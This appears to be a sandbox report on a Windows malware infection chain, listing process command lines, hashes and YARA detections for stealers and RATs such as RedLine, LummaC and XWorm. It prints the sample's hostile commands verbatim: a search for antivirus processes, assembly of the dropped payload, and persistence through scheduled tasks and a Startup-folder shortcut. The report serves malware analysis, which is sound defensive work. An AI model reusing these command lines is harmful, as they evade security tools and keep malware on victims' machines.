Show Windows behavior

Target ID:	1
Start time:	04:46:52
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:46:52
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:46:53
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xd00000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:46:53
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0xa90000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:46:54
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xd00000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:46:54
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0xa90000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:46:55
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 591950
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:46:55
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "BachelorRayPotentialBeats" Itsa
Imagebase:	0xa90000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:46:55
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:46:55
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\591950\Shipment.pif
Wow64 process (32bit):	true
Commandline:	Shipment.pif E
Imagebase:	0x950000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	04:46:55
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xcc0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:46:56
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	04:46:56
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:46:56
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Imagebase:	0x4b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:46:56
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	04:46:56
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:46:57
Start date:	31/08/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
Imagebase:	0x7ff7b6fc0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:46:58
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"
Imagebase:	0x5b0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:47:06
Start date:	31/08/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
Imagebase:	0x7ff7b6fc0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	04:47:07
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"
Imagebase:	0x5b0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	04:48:56
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe"
Imagebase:	0xc90000
File size:	327'168 bytes
MD5 hash:	0EC1F7CC17B6402CD2DF150E0E5E92CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	04:48:57
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Imagebase:	0x4b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	04:48:57
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	04:48:57
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Imagebase:	0x730000
File size:	327'168 bytes
MD5 hash:	0EC1F7CC17B6402CD2DF150E0E5E92CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 96%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	04:48:59
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Imagebase:	0x730000
File size:	327'168 bytes
MD5 hash:	0EC1F7CC17B6402CD2DF150E0E5E92CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	04:48:59
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Imagebase:	0x4b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	04:48:59
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	04:48:59
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000142101\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000142101\build2.exe"
Imagebase:	0x400000
File size:	492'544 bytes
MD5 hash:	F9A4F6684D1BF48406A42921AEBC1596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001F.00000002.4168709454.0000000002A0F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000003.3728665099.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.4162638293.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	04:49:02
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe"
Imagebase:	0x910000
File size:	104'448 bytes
MD5 hash:	771B8E84BA4F0215298D9DADFE5A10BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	04:49:05
Start date:	31/08/2024
Path:	C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
Imagebase:	0xaf0000
File size:	104'448 bytes
MD5 hash:	771B8E84BA4F0215298D9DADFE5A10BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	04:49:06
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Imagebase:	0x730000
File size:	327'168 bytes
MD5 hash:	0EC1F7CC17B6402CD2DF150E0E5E92CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	04:49:06
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Imagebase:	0x4b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	04:49:06
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	04:49:09
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe"
Imagebase:	0x400000
File size:	2'846'145 bytes
MD5 hash:	FD2DEFC436FC7960D6501A01C91D893E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 92%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	04:49:14
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000194001\meta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000194001\meta.exe"
Imagebase:	0x7ff617d10000
File size:	2'806'784 bytes
MD5 hash:	3AACE51D76B16A60E94636150BD1137E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 88%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	04:49:15
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Imagebase:	0x730000
File size:	327'168 bytes
MD5 hash:	0EC1F7CC17B6402CD2DF150E0E5E92CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	04:49:16
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	04:49:16
Start date:	31/08/2024
Path:	C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Imagebase:	0xbf0000
File size:	96'256 bytes
MD5 hash:	DB5717FD494495EEA3C8F7D4AB29D6B0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 84%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	04:49:19
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe"
Imagebase:	0x140000
File size:	330'792 bytes
MD5 hash:	D6FCA3CD57293390CCF9D2BC83662DDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	04:49:19
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x1c0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	04:49:21
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x200000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	04:49:21
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xaa0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002E.00000002.4554653259.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	04:49:23
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe"
Imagebase:	0x400000
File size:	1'104'936 bytes
MD5 hash:	8E74497AFF3B9D2DDB7E7F819DFC69BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 100%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	04:49:24
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Imagebase:
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	04:49:26
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Imagebase:	0xf90000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	04:49:26
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd20000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	04:49:26
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	26.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.5%
Total number of Nodes:	576
Total number of Limit Nodes:	19

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00403899 Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038B8
SetErrorMode.KERNELBASE(00008001), ref: 004038C3
OleInitialize.OLE32(00000000), ref: 004038CA

Part of subcall function 00406312: GetModuleHandleA.KERNEL32(?,?,00000020,004038DC,00000008), ref: 00406320
Part of subcall function 00406312: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038DC,00000008), ref: 0040632B
Part of subcall function 00406312: GetProcAddress.KERNEL32(00000000), ref: 0040633D

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038F2

Part of subcall function 0040601F: lstrcpynW.KERNEL32(?,?,00002004,00403907,007E95E0,NSIS Error), ref: 0040602C

GetCommandLineW.KERNEL32(007E95E0,NSIS Error), ref: 00403907
GetModuleHandleW.KERNEL32(00000000,008420A0,00000000), ref: 0040391A
CharNextW.USER32(00000000,008420A0,00000020), ref: 00403941
GetTempPathW.KERNEL32(00002004,008560C8,00000000,00000020), ref: 00403A16
GetWindowsDirectoryW.KERNEL32(008560C8,00001FFF), ref: 00403A2B
lstrcatW.KERNEL32(008560C8,\Temp), ref: 00403A37
DeleteFileW.KERNELBASE(008520C0), ref: 00403A4E
OleUninitialize.OLE32(?), ref: 00403AE7
ExitProcess.KERNEL32 ref: 00403B07
lstrcatW.KERNEL32(008560C8,~nsu.tmp), ref: 00403B13
lstrcmpiW.KERNEL32(008560C8,0084E0B8,008560C8,~nsu.tmp), ref: 00403B1F
CreateDirectoryW.KERNEL32(008560C8,00000000), ref: 00403B2B
SetCurrentDirectoryW.KERNEL32(008560C8), ref: 00403B32
DeleteFileW.KERNEL32(007B1A20,007B1A20,?,007F6008,00409204,007F2000,?), ref: 00403B83
CopyFileW.KERNEL32(0085E0D8,007B1A20,00000001), ref: 00403B97
CloseHandle.KERNEL32(00000000,007B1A20,007B1A20,?,007B1A20,00000000), ref: 00403BC4
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C1A
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C56

Strings

NCRC, xrefs: 00403992
~nsu.tmp, xrefs: 00403B0D
\Temp, xrefs: 00403A31
SeShutdownPrivilege, xrefs: 00403C2C
_?=, xrefs: 00403A7A
Error launching installer, xrefs: 00403A93
/D=, xrefs: 004039BC
NSIS Error, xrefs: 004038F8

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
